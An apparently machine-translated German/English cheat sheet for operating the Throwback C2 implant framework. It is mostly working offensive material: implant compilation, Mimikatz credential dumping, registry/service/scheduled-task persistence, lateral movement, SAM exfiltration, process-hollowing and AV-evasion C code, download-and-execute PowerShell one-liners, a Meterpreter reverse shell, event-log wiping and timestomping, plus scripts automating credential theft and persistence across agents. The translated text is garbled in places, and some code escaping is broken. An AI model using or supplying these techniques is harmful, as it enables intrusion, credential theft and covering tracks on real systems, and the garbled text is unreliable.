C2 Framework Cheat Sheet¶
Überblick¶
Throwback ist ein HTTP/HTTPS-Beaconing-Implantat mit einem C2-Server, der für rote Teamoperationen und Penetrationstests konzipiert ist. Entwickelt von Silent Break Security besteht es aus einem C++ Backdoor Implantat und einem PHP/MySQL-basierten Befehls- und Steuerserver. Throwback konzentriert sich auf verdeckte Kommunikation, Persistenz und Stealth Operationen mit minimalem Footprint.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install dependencies (Ubuntu/Debian)¶
sudo apt update sudo apt install -y apache2 mysql-server php php-mysql php-curl php-json git build-essential mingw-w64
Install cross-compilation tools for Windows¶
sudo apt install -y gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
Start services¶
sudo systemctl start apache2 sudo systemctl start mysql sudo systemctl enable apache2 sudo systemctl enable mysql ```_
MySQL Setup¶
```sql -- Configure MySQL database sudo mysql -u root -p
CREATE DATABASE throwback; CREATE USER 'throwback'@'localhost' IDENTIFIED BY 'StrongPassword123!'; GRANT ALL PRIVILEGES ON throwback.* TO 'throwback'@'localhost'; FLUSH PRIVILEGES; EXIT; ```_
Server Installation¶
```bash
Clone Throwback repository¶
git clone https://github.com/silentbreaksec/Throwback.git cd Throwback
Set up web server directory¶
sudo cp -r Server/* /var/www/html/ sudo chown -R www-data:www-data /var/www/html/ sudo chmod -R 755 /var/www/html/
Configure database connection¶
sudo nano /var/www/html/config.php ```_
Datei konfigurieren¶
```php
```_
Datenbank Schema Setup¶
```sql -- Create database tables USE throwback;
CREATE TABLE agents ( id INT AUTO_INCREMENT PRIMARY KEY, agent_id VARCHAR(255) UNIQUE NOT NULL, hostname VARCHAR(255), username VARCHAR(255), ip_address VARCHAR(45), os_version VARCHAR(255), process_id INT, process_name VARCHAR(255), first_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP, last_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, status ENUM('active', 'inactive', 'dead') DEFAULT 'active' );
CREATE TABLE tasks ( id INT AUTO_INCREMENT PRIMARY KEY, agent_id VARCHAR(255), task_id VARCHAR(255) UNIQUE NOT NULL, command TEXT, arguments TEXT, status ENUM('pending', 'sent', 'completed', 'failed') DEFAULT 'pending', created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, completed_at TIMESTAMP NULL, FOREIGN KEY (agent_id) REFERENCES agents(agent_id) );
CREATE TABLE results ( id INT AUTO_INCREMENT PRIMARY KEY, task_id VARCHAR(255), agent_id VARCHAR(255), output LONGTEXT, error_output TEXT, received_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, FOREIGN KEY (task_id) REFERENCES tasks(task_id), FOREIGN KEY (agent_id) REFERENCES agents(agent_id) );
CREATE TABLE files ( id INT AUTO_INCREMENT PRIMARY KEY, agent_id VARCHAR(255), filename VARCHAR(255), filepath TEXT, filesize BIGINT, file_hash VARCHAR(64), upload_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP, FOREIGN KEY (agent_id) REFERENCES agents(agent_id) ); ```_
Implant Compilation¶
Windows Implant (x64)¶
```bash
Compile 64-bit Windows implant¶
cd Implant x86_64-w64-mingw32-gcc -o throwback_x64.exe \ -DHOST=\"192.168.1.100\" \ -DPORT=80 \ -DSSL=0 \ -DINTERVAL=30 \ -DJITTER=10 \ -DKEY=\"YourSecretEncryptionKey123\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Strip symbols for smaller size¶
x86_64-w64-mingw32-strip throwback_x64.exe ```_
Windows Implant (x86)¶
```bash
Compile 32-bit Windows implant¶
i686-w64-mingw32-gcc -o throwback_x86.exe \ -DHOST=\"192.168.1.100\" \ -DPORT=80 \ -DSSL=0 \ -DINTERVAL=30 \ -DJITTER=10 \ -DKEY=\"YourSecretEncryptionKey123\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Strip symbols¶
i686-w64-mingw32-strip throwback_x86.exe ```_
HTTPS Implant¶
```bash
Compile with SSL support¶
x86_64-w64-mingw32-gcc -o throwback_https.exe \ -DHOST=\"secure.example.com\" \ -DPORT=443 \ -DSSL=1 \ -DINTERVAL=60 \ -DJITTER=20 \ -DKEY=\"YourSecretEncryptionKey123\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32 ```_
Benutzerdefinierte erstellen Skript¶
```bash
!/bin/bash¶
build_implant.sh - Custom implant builder¶
HOST="192.168.1.100" PORT="80" SSL="0" INTERVAL="30" JITTER="10" KEY="YourSecretEncryptionKey123" OUTPUT_DIR="./builds"
Create output directory¶
mkdir -p $OUTPUT_DIR
Build x64 implant¶
echo "[+] Building x64 implant..." x86_64-w64-mingw32-gcc -o \(OUTPUT_DIR/throwback_x64.exe \ -DHOST=\"\)HOST\" \ -DPORT=\(PORT \ -DSSL=\)SSL \ -DINTERVAL=\(INTERVAL \ -DJITTER=\)JITTER \ -DKEY=\"$KEY\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Build x86 implant¶
echo "[+] Building x86 implant..." i686-w64-mingw32-gcc -o \(OUTPUT_DIR/throwback_x86.exe \ -DHOST=\"\)HOST\" \ -DPORT=\(PORT \ -DSSL=\)SSL \ -DINTERVAL=\(INTERVAL \ -DJITTER=\)JITTER \ -DKEY=\"$KEY\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Strip symbols¶
x86_64-w64-mingw32-strip $OUTPUT_DIR/throwback_x64.exe i686-w64-mingw32-strip $OUTPUT_DIR/throwback_x86.exe
echo "[+] Implants built successfully in $OUTPUT_DIR" ls -la $OUTPUT_DIR/ ```_
Web Interface¶
Zugriff auf die Schnittstelle¶
```bash
Access web interface¶
http://192.168.1.100/index.php
Login credentials (from config.php)¶
Username: admin Password: SecurePassword456!
HTTPS access (if SSL configured)¶
https://secure.example.com/index.php ```_
Dashboard Übersicht¶
| Section | Description |
|---|---|
| Agents | View and manage active implants |
| Tasks | Create and monitor tasks |
| Results | View command execution results |
| Files | Manage uploaded/downloaded files |
| Logs | View system and error logs |
| Settings | Configure C2 server settings |
Personalmanagement¶
```php // View active agents GET /agents.php
// Agent details GET /agent_details.php?id=AGENT_ID
// Kill agent POST /kill_agent.php \\{ "agent_id": "AGENT_ID" \\} ```_
Ausführung des Befehls¶
Grundlegende Befehle¶
```bash
System information¶
whoami # Current user hostname # Computer name pwd # Current directory dir # List directory contents cd [directory] # Change directory type [file] # Read file contents
Process management¶
tasklist # List running processes taskkill /PID [pid] # Kill process by PID taskkill /IM [name] # Kill process by name
Network information¶
ipconfig /all # Network configuration netstat -an # Network connections arp -a # ARP table route print # Routing table ```_
Dateioperationen¶
```bash
File management¶
download [file] # Download file from target upload [local] [remote] # Upload file to target copy [source] [dest] # Copy file move [source] [dest] # Move file del [file] # Delete file mkdir [directory] # Create directory rmdir [directory] # Remove directory
File search¶
dir /s [pattern] # Search for files findstr [pattern] [file] # Search within files ```_
Register Operationen¶
```bash
Registry queries¶
reg query [key] # Query registry key reg add [key] /v [value] /d [data] # Add registry value reg delete [key] /v [value] # Delete registry value
Common registry locations¶
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKLM\SYSTEM\CurrentControlSet\Services ```_
Einrichtende Operationen¶
```bash
Credential harvesting¶
mimikatz # Execute Mimikatz sekurlsa::logonpasswords # Dump logon passwords lsadump::sam # Dump SAM database lsadump::cache # Dump cached credentials
Token manipulation¶
whoami /priv # Check privileges whoami /groups # Check group membership ```_
Erweiterte Funktionen¶
Persistenzmechanismen¶
```bash
Registry persistence¶
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"
Scheduled task persistence¶
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon
Service persistence¶
sc create "WindowsUpdateService" binPath= "C:\Windows\Temp\throwback.exe" start= auto sc start "WindowsUpdateService"
Startup folder persistence¶
copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" ```_
Spätere Bewegung¶
```bash
Remote execution via WMI¶
wmic /node:[target] /user:[user] /password:[pass] process call create "cmd.exe /c [command]"
PSExec-style execution¶
net use \[target]\IPC$ /user:[user] [password] copy throwback.exe \[target]\C$\Windows\Temp\ sc \[target] create "TempService" binPath= "C:\Windows\Temp\throwback.exe" sc \[target] start "TempService"
PowerShell remoting¶
powershell -c "Invoke-Command -ComputerName [target] -Credential (Get-Credential) -ScriptBlock \\{[command]\\}" ```_
Daten Exfiltration¶
```bash
File exfiltration¶
download C:\Users\Administrator\Documents\sensitive.docx download C:\Windows\System32\config\SAM download C:\inetpub\logs\LogFiles\W3SVC1*.log
Database exfiltration¶
sqlcmd -S [server] -E -Q "SELECT * FROM sensitive_table" -o output.txt download output.txt
Registry exfiltration¶
reg export HKLM\SAM sam.reg download sam.reg ```_
Steganbau¶
```bash
Hide data in images¶
copy /b image.jpg + data.txt hidden.jpg upload hidden.jpg C:\Windows\Temp\wallpaper.jpg
Hide executables in legitimate files¶
copy /b legitimate.pdf + throwback.exe hidden.pdf ```_
Automatisierung und Schrift¶
PHP Automationsskript¶
```php
db = new mysqli($GLOBALS['servername'], $GLOBALS['username'], $GLOBALS['password'], $GLOBALS['dbname']); \\\\} public function getActiveAgents() \\\\{ $result = $this->db->query("SELECT * FROM agents WHERE status = 'active'"); return $result->fetch_all(MYSQLI_ASSOC); \\\\} public function createTask($agent_id, $command, $arguments = '') \\\\{ $task_id = uniqid('task_'); $stmt = $this->db->prepare("INSERT INTO tasks (agent_id, task_id, command, arguments) VALUES (?, ?, ?, ?)"); $stmt->bind_param("ssss", $agent_id, $task_id, $command, $arguments); return $stmt->execute(); \\\\} public function automatedRecon($agent_id) \\\\{ $commands = [ 'whoami', 'hostname', 'ipconfig /all', 'tasklist', 'netstat -an', 'dir C:\Users', 'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' ]; foreach ($commands as $cmd) \\\\{ $this->createTask($agent_id, $cmd); sleep(2); \\\\} \\\\} public function credentialHarvesting($agent_id) \\\\{ // Check if agent has admin privileges first $this->createTask($agent_id, 'whoami', '/priv'); sleep(5); // Execute credential harvesting $this->createTask($agent_id, 'mimikatz', 'sekurlsa::logonpasswords'); $this->createTask($agent_id, 'mimikatz', 'lsadump::sam'); $this->createTask($agent_id, 'mimikatz', 'lsadump::cache'); \\\\} public function establishPersistence($agent_id) \\\\{ $persistence_commands = [ 'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"', 'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon', 'copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"' ]; foreach ($persistence_commands as $cmd) \\\\{ $this->createTask($agent_id, 'cmd', "/c $cmd"); sleep(3); \\\\} \\\\} \\\\} // Usage $automation = new ThrowbackAutomation(); $agents = $automation->getActiveAgents(); foreach ($agents as $agent) \\\\{ echo "[+] Processing agent: \\\\{$agent['agent_id']\\\\}\n"; $automation->automatedRecon($agent['agent_id']); // Wait before credential harvesting sleep(30); $automation->credentialHarvesting($agent['agent_id']); // Establish persistence $automation->establishPersistence($agent['agent_id']); \\\\} ?>```_
Python API Client¶
```python
!/usr/bin/env python3¶
throwback_client.py - Python API client for Throwback¶
import requests import json import time from urllib3.exceptions import InsecureRequestWarning
Disable SSL warnings¶
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class ThrowbackClient: def init(self, base_url, username, password): self.base_url = base_url.rstrip('/') self.session = requests.Session() self.session.verify = False self.authenticate(username, password)
def authenticate(self, username, password):
"""Authenticate with Throwback server"""
auth_data = \\\\{
'username': username,
'password': password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/login.php", data=auth_data)
if response.status_code == 200 and "dashboard" in response.text.lower():
print("[+] Authentication successful")
else:
raise Exception("Authentication failed")
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents.php")
return response.json()
def create_task(self, agent_id, command, arguments=""):
"""Create a new task for an agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': command,
'arguments': arguments
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/tasks.php", data=task_data)
return response.json()
def get_task_results(self, task_id):
"""Get results for a specific task"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/results.php?task_id=\\\\{task_id\\\\}")
return response.json()
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': 'download',
'arguments': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download.php", data=task_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
print(f"[+] File downloaded: \\\\{local_path\\\\}")
else:
print(f"[-] Download failed: \\\\{response.text\\\\}")
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\\Users",
"systeminfo"
]
task_ids = []
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.create_task(agent_id, cmd)
if 'task_id' in result:
task_ids.append(result['task_id'])
time.sleep(2)
return task_ids
def wait_for_results(self, task_ids, timeout=300):
"""Wait for task results"""
start_time = time.time()
completed_tasks = []
while len(completed_tasks) ``< len(task_ids) and (time.time() - start_time) < timeout:
for task_id in task_ids:
if task_id not in completed_tasks:
results = self.get_task_results(task_id)
if results and results.get('status') == 'completed':
completed_tasks.append(task_id)
print(f"[+] Task \\\{task_id\\\} completed")
print(f"Output: \\\{results.get('output', '')\\\}")
time.sleep(5)
return completed_tasks
Usage example¶
if name == "main": client = ThrowbackClient("http://192.168.1.100", "admin", "SecurePassword456!")
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\{len(agents)\\\} active agents")
for agent in agents:
agent_id = agent['agent_id']
print(f"[+] Processing agent: \\\{agent_id\\\}")
# Perform reconnaissance
task_ids = client.automated_recon(agent_id)
# Wait for results
completed = client.wait_for_results(task_ids)
print(f"[+] Completed \\\{len(completed)\\\} tasks for agent \\\{agent_id\\\}")
```_
PowerShell Automation¶
```powershell
throwback_automation.ps1 - PowerShell automation script¶
function Invoke-ThrowbackAutomation \{ param( [string]\(ServerURL = "http://192.168.1.100", [string]\)Username = "admin", [string]$Password = "SecurePassword456!" )
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\{
username = $Username
password = $Password
\\\}
try \\\{
$loginResponse = Invoke-WebRequest -Uri "$ServerURL/login.php" -Method POST -Body $authData -WebSession $session
if ($loginResponse.StatusCode -eq 200) \\\{
Write-Host "[+] Authentication successful"
\\\}
\\\}
catch \\\{
Write-Error "Authentication failed: $_"
return
\\\}
# Get active agents
try \\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents.php" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\}
catch \\\{
Write-Error "Failed to get agents: $_"
return
\\\}
# Process each agent
foreach ($agent in $agents) \\\{
Write-Host "[+] Processing agent: $($agent.agent_id)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\Users",
"systeminfo"
)
foreach ($cmd in $commands) \\\{
$taskData = @\\\{
agent_id = $agent.agent_id
command = $cmd
arguments = ""
\\\}
try \\\{
$taskResponse = Invoke-WebRequest -Uri "$ServerURL/api/tasks.php" -Method POST -Body $taskData -WebSession $session
Write-Host "[+] Task created for command: $cmd"
Start-Sleep -Seconds 2
\\\}
catch \\\{
Write-Warning "Failed to create task for command '$cmd': $_"
\\\}
\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\}
\}
Execute automation¶
Invoke-ThrowbackAutomation ```_
Evasion Techniken¶
Anti-Virus Evasion¶
```c // AV evasion techniques in implant code
// String obfuscation char obfuscated_url[] = \{0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x00\}; // "http://"
// API hashing DWORD hash_api(char* api_name) \{ DWORD hash = 0; while (*api_name) \{ hash = ((hash << 5) + hash) + *api_name++; \} return hash; \}
// Sleep obfuscation void obfuscated_sleep(DWORD milliseconds) \{ LARGE_INTEGER interval; interval.QuadPart = -(milliseconds * 10000LL); NtDelayExecution(FALSE, &interval); \}
// Process hollowing BOOL process_hollowing(char* target_process, char* payload) \{ STARTUPINFO si = \{0\}; PROCESS_INFORMATION pi = \{0\};
// Create suspended process
if (!CreateProcess(target_process, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &si, &pi)) \\\{
return FALSE;
\\\}
// Unmap original image
ZwUnmapViewOfSection(pi.hProcess, GetImageBase(pi.hProcess));
// Allocate memory and write payload
LPVOID base_addr = VirtualAllocEx(pi.hProcess, GetImageBase(pi.hProcess),
payload_size, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, base_addr, payload, payload_size, NULL);
// Resume execution
ResumeThread(pi.hThread);
return TRUE;
\} ```_
Netzwerk Evasion¶
```c // Domain fronting implementation char fronted_domain[] = "cdn.example.com"; char real_host[] = "c2.malicious.com";
// Custom user agents char user_agents[][256] = \{ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36" \};
// Jitter implementation void jittered_sleep(DWORD base_interval, DWORD jitter_percent) \{ DWORD jitter = (base_interval * jitter_percent) / 100; DWORD min_sleep = base_interval - jitter; DWORD max_sleep = base_interval + jitter;
DWORD actual_sleep = min_sleep + (rand() % (max_sleep - min_sleep + 1));
Sleep(actual_sleep * 1000);
\}
// Traffic shaping void shape_traffic(char* data, DWORD data_size) \{ // Split large data into smaller chunks DWORD chunk_size = 1024 + (rand() % 2048); // Random chunk size DWORD chunks = (data_size + chunk_size - 1) / chunk_size;
for (DWORD i = 0; i < chunks; i++) \\\{
DWORD current_chunk_size = min(chunk_size, data_size - (i * chunk_size));
send_chunk(data + (i * chunk_size), current_chunk_size);
// Random delay between chunks
Sleep((rand() % 5000) + 1000); // 1-6 seconds
\\\}
\} ```_
Erinnerung¶
```c // Memory encryption void encrypt_memory(LPVOID address, SIZE_T size, BYTE key) \{ BYTE* ptr = (BYTE*)address; for (SIZE_T i = 0; i < size; i++) \{ ptr[i] ^= key; \} \}
// Heap encryption typedef struct \{ LPVOID original_addr; SIZE_T size; BYTE key; \} ENCRYPTED_HEAP;
ENCRYPTED_HEAP* allocate_encrypted_heap(SIZE_T size) \{ ENCRYPTED_HEAP* heap = malloc(sizeof(ENCRYPTED_HEAP)); heap->``original_addr = VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE); heap->size = size; heap->key = (BYTE)(rand() % 256);
// Encrypt allocated memory
encrypt_memory(heap->original_addr, heap->size, heap->key);
return heap;
\\}
// Stack string obfuscation void obfuscated_string_copy(char* dest, char* src, BYTE key) \\{ while (*src) \\{ *dest++ = *src++ ^ key; \\} *dest = '\0'; \\} ```_
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Use Throwback with Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Throwback¶
upload meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload¶
cmd /c C:\Windows\Temp\update.exe
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt¶
```bash
Generate Empire stager¶
Use Throwback for initial access, pivot to Empire¶
From Throwback implant¶
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire¶
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use Throwback for initial access, pivot to Beacon¶
From Throwback implant¶
cmd /c powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```_
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Use HTTPS with valid certificates¶
Configure domain fronting¶
Implement certificate pinning¶
Use legitimate user agents¶
Example HTTPS configuration¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
Configure Apache for HTTPS¶
sudo a2enmod ssl sudo systemctl restart apache2 ```_
Verkehrsanalyse Evanation¶
```bash
Mimic legitimate traffic patterns¶
Use common HTTP methods and headers¶
Implement realistic timing¶
Blend with normal network traffic¶
Example legitimate traffic mimicking¶
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive ```_
Anti-Forensik¶
```bash
Clear event logs¶
wevtutil cl System wevtutil cl Security wevtutil cl Application
Timestomping¶
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Secure deletion¶
sdelete -z -s C:\Windows\Temp\ ```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Implant not connecting¶
- Check firewall rules
- Verify web server configuration
- Test network connectivity
- Check database connection
Database connection issues¶
Test MySQL connection¶
mysql -u throwback -p -h localhost throwback
Web server issues¶
Check Apache error logs¶
sudo tail -f /var/log/apache2/error.log
Check PHP errors¶
sudo tail -f /var/log/apache2/error.log|grep PHP ```_
Debug Mode¶
```php // Enable debug mode in config.php $debug_mode = true;
// Check debug logs tail -f /var/log/apache2/access.log tail -f /var/log/apache2/error.log ```_
Leistungsoptimierung¶
```bash
Optimize MySQL¶
sudo mysql_secure_installation
Optimize Apache¶
sudo a2enmod rewrite sudo a2enmod deflate sudo systemctl restart apache2
Monitor system resources¶
htop iotop netstat -tulpn ```_
Best Practices¶
Betriebsplanung¶
- **Pre-engagement Setup*: Server- und Kompilierungsimplantate vor dem Eingriff konfigurieren
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- **Cleanup-Verfahren*: Plan zur Artefaktentfernung und Betriebsreinigung
- Teamkoordination: Zentralisierte C2 für Teamkooperation verwenden
Sicherheitsüberlegungen¶
```bash
Secure deployment¶
Use strong authentication¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Implant management¶
Use unique encryption keys¶
Implement kill dates¶
Regular implant rotation¶
Secure communication channels¶
```_
Dokumentation und Reporting¶
```bash
Operation documentation¶
Maintain detailed logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```_
Ressourcen¶
- Throwback GitHub Repository
- Silent Break Security Blog
- (LINK_5)
- [MITRE ATT&CK Framework](LINK_5_
- (SANS Red Team Operations)(LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Throwback C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *